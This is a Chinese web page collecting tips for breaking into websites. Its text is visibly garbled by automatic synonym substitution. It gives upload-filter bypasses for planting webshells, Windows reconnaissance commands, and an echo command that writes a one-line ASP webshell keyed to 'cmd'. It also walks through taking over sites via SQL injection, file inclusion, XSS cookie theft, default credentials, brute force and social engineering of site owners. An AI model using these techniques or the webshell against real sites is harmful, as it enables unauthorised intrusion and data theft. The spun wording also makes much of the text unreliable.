|
|
|
联系客服020-83701501

WEB下渗透测试经验技巧整理

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
WEB下渗透测试指点才力整理

上传裂缝拿shell:

1.间接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.
2.就是在上传时在后缀后面加空格大要加几点,可能也会有惊异的发明。例:*.asp ,*.asp..。
3.使用两重扩台甫上传例如:*.jpg.asa格局(也可能配上第二点一同使用)。
4.gif文件头坑骗
5.同名频频上传也很OK。:

入侵渗透中用到的饬令,语法:

set,systeminfo,ipconfig,ping,使用这些饬令可能收到比拟多的琐细新闻
tasklist /svc?? 搜查 处事对应的pid
netstat -ano,netstat -abnv
fsutil.exe fsinfo drives? 列出局部盘符
dir d:*conn*.* /s???? 找数据库毗邻文件
telnet 218.25.88.234 3389??? 对内部是否开放了这个端口
echo? ^<%execute(request(“cmd”))%^> >>e:kX.asp?? 写一句话到e:k目录,密码为cmd.
type d:wwwroot站点k6.asp >d:wwwroot123a.asp?? 传送d:wwwroot站点下的k6.asp到d:wwwroot123重命名为a.asp

注册表缓慢新闻:

HKEY_LOCAL_MACHINESOFTWAREMySQL AB??? mysql 注册表地位
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG?? 华众主机地位
HKEY_LOCAL_MACHINESOFTWAREcat softserv-u??? serv-u 地位
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcpPortNamber 3389端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters??? 1433端口
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMSFtpsvcParametersVirtual Roots? 处事器ftp路径

处事器日志文件物理路径:

平安日志文件:%systemroot%system32config SecEvent.EVT
琐细日志文件:%systemroot%system32config SysEvent.EVT
操作步伐日志文件:%systemroot%system32config AppEvent.EVT
FTP毗邻日志和HTTPD事故日志:systemroot% system32LogFiles,上面还有子文件夹,分袂对理当FTP和Web处事的日志,其对应的后缀名为.Log。
诺顿杀毒日志:C:Documents and SettingsAll UsersApplication DataSymantec

oldjun 大牛写的入侵网站的指点:

上面谈谈个人入侵的指点,不分语言,只谈拿站点shell,至于提权,这里不说,我也很少提权,除非确实有必要!~

1.不管什么站,不管什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,间接上传shell,诸位不要笑,偶然候你花好久搞一个站,结尾发明有个现成的上传点,并且很冗杂猜到,无非这种环境发生在asp居多!

2.asp(aspx)+MSSQL先考虑注入,通常的注入都有DBowner权限可能间接写shell;假定写不了,大要站点与数据库荟萃,那就猜数据,从靠山动手了,靠山可能上传大要改配置文件;

3.asp(aspx)+ACCESS拿shell通常只需3种法子,一是前台上传大要注入进靠山上传;二是注入进靠山改配置文件;三是注入进靠山备份数据库大要暴库后知道是asp大要asa数据库于是间接写一句话;

4.php+MYSQL通常是注入进靠山上传,偶然运气好些权限够高可能注入select into outfile;从此包含,分本地与长途,长途包含在高版本php是不反对的,于是想法子本地上传图片文件大要写到log里;从此php步伐某某未阴郁的 裂缝,运气好可能间接写shell。

5.jsp+MYSQL使用数据库拿权限方面根蒂根本同php,并且jsp的上传根蒂根本很少检查文件后缀,于是只需有注入点与靠山,拿shell相称的冗杂。jsp+ORACLE的站我碰着的未几,碰着的也是猜出用户名与密码从靠山动手的。

6.不管什么大站,主站通常都很平安(不然早被人玩了),于是通常从二级域名动手,猜出主站的某些用户名与密码大要搞到主站的源代码,大要旁注取得同网段处事器后cain或arp。

7.通常的大站很少有效现成的CMS的,于是假定你有幸找到源码,那你就发了,注入裂缝啊,上传裂缝啊,写文件裂缝啊,都驾御在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可能很弥留拿下。

8.上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经使用这个搞下hw);从此良多写文件的中央,都可能xxoo,www.91ri.org屡试不爽。上传别忘了.asp(诚然.asa,.cer,.cdx都可能啦)目录的妙用。

9.php站不管windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在 server变量注入的时候还是可能select into outfile,今年我搞过某未开源cms就是这个环境,通常环境下为on就别考虑写文件了,无非有这个权限别忘了读文件源码,由于load_file的 参数是可能编码的。

10.猜路径大要文件在入侵中出格必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可能考虑看站点下的robot.txt大要robots.txt,会有惊喜。

11.东西的垄断很烦忙,入侵从前用WVS扫扫会有助入侵;注入东西诚然良多,但不见得都好使,当初的软硬防火墙、防注入愈来愈厉害,事先候你就别偷懒,多手工有助你成长。

12.遇到过一流监控么,遇到其它防post的防火墙么,偶然候一句话进去了都无法传大马,事先候,你先学学编码,学学变换绕过。

13.想搞通常的小站,记得搜查这个小站的版权,找做这个站的公司,从此从这个公司做的其它站动手,取得源码再回头搞,我曾经颠末这个法子拿下某知名制药的公司站。

14.旁注的思路永远无非时,遇到dbowner的注入,可能很舒服写shell到你必要的站,省得麻烦的提权了;运气欠好,抱残守缺拿shell提权取得你所需。

15.永远别忘记社会工程学,使用社工把自身当做一个什么也不会的人,从某某站长的qq,身份证,邮箱等等动手,可能偶然可能会居心外;别的别忘记admin,admin;test,test;123456,123456这种冗杂的测验考试,诚然,你也可能暴力破解。

16.别忽视XSS,别忽视cookie,XSS可能偷cookie,更有若干妙用,自身学会畅通领悟;cookie可能虚拟登岸,cookie可能注入,cookie注入可能绕绝大少数的防火墙。

17.如今搞站多多收集路径啊,源码啊,东西啊,充实自身的“兵器”库;最好把自身的入侵步调记载下去,大要那时深思下,我通常但凡记在txt里,别的要做到触类旁通。

18.多深造,多看源码,多看颁布出来的0day,剧本是入侵的条件,而不是东西,会用东西会装B你还没入门。

91ri.org评:个人感应吧 17.18才是精髓,良多时候渗透技能的高低不定然差别在东西而是指点,多看看自身过来的渗透步奏,看看哪里做的是无勤勉,那边那边是必必要做的探测,触类旁通很烦忙!

本文由Nuclear’Atk整理 由网络平安攻防研究室(www.91ri.org)新闻平安小组收集整理。

数安新闻+更多

证书相关+更多